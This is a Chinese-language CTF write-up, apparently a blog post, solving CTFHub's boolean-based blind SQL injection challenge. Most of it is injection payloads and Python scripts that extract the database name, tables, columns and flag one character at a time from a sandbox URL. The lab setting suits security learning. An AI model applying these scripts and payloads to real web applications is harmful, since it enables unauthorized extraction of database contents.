当前位置:网站首页>ctfhub-sql布尔盲注
ctfhub-sql布尔盲注
2022-06-11 17:46:00 【榴莲 蛋挞】
打开网址,先输入:
1 and length(database())>3得到:

输入:
1 and length(database())<3得到:

看出可以布尔盲注
查看当前表名:
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,5):
for i in range(43,126):
ss="?id=1 and ascii(substr(database(),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
于是先得到当前数据库种包含的表名:
?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),j,1))=iimport requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,10):
for i in range(43,126):
ss="?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
得到:

再查看表格flag包含的字段:
?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),j,1))=i
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,10):
for i in range(43,126):
ss="?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
得到:

于是最后一步读取flag表种flag字段的内容:
?id=1 and ascii(substr((select flag from flag),j,1))=i
import requests
re=requests.session()
url1='http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st=''
for j in range(1,40):
for i in range(43,126):
ss="?id=1 and ascii(substr((select flag from flag),"+str(j)+",1))="+str(i)
url=url1+ss
pa=re.get(url=url).text
if "query_success"in pa:
st+=chr(i)
break
print(st)
得到:
边栏推荐
- Several ways to recover tidb data from accidental deletion
- 【MapReduce】一个完整MR程序案例教你如何用IDEA打包及运行
- 【C】 Compilation preprocessing and environment
- tidb-cdc同步mysql没有的特性到mysql时的处理
- 6-2 writing articles (*)
- [collect first and use it sooner or later] 100 Flink high-frequency interview questions series (III)
- The tle6389 step-down DC-DC switch controller has high efficiency in the whole load range of 1mA to 2.5A - keshijin mall
- 6-5 count the number of words (file) (*)
- [solution] codeforces round 798 (Div. 2)
- Service learning notes 02- actual combat startservice and bindservice
猜你喜欢

Ffmpeg hard codec inter QSV

vulhub

Bracket generation ---2022/02/25

Network Security Threat Intelligence System

zabbix怎样自定义mysql监控项并触发告警

Ffmpeg parity field frame interlace progressive command and code processing

【深度学习基础】神经网络的学习(3)

合并K个升序链表---2022/02/26
![[foundation of deep learning] learning of neural network (3)](/img/a5/1b80ba85faf8fa636b784c76d4df2f.png)
[foundation of deep learning] learning of neural network (3)
![Spring 2021 daily question [week3 not finished]](/img/a4/72f2235d014613d26be0fc3524d236.jpg)
Spring 2021 daily question [week3 not finished]
随机推荐
如何学习和自学
Three steps of ffmpeg CBR precise bitstream control
6-7 file read / write operation
【题解】Codeforces Round #798 (Div. 2)
ArrayList collection, object array
Dynamic: capturing network dynamics using dynamic graph representation learning
tidb-gc相关问题
Chorus translation
Several ways to recover tidb data from accidental deletion
Tidb CDC synchronization of features not available in MySQL to MySQL
tidb-写热点的测试及分析
[pat grade B question bank] complete summary
括号生成---2022/02/25
Tidb CDC log tables are not eligible to replicate
There are so many open source projects. This time, I'll show you the differences between different versions and understand the meaning of alpha version, beta version and RC version
10 ways to reset any user password
Learning about canvas API
【实用脚本】获取某个文件的行号,然后删除文件内容。
Global and Chinese markets of solid polymer aluminum capacitors 2022-2028: Research Report on technology, participants, trends, market size and share
Spring 2021 daily question [end of week4]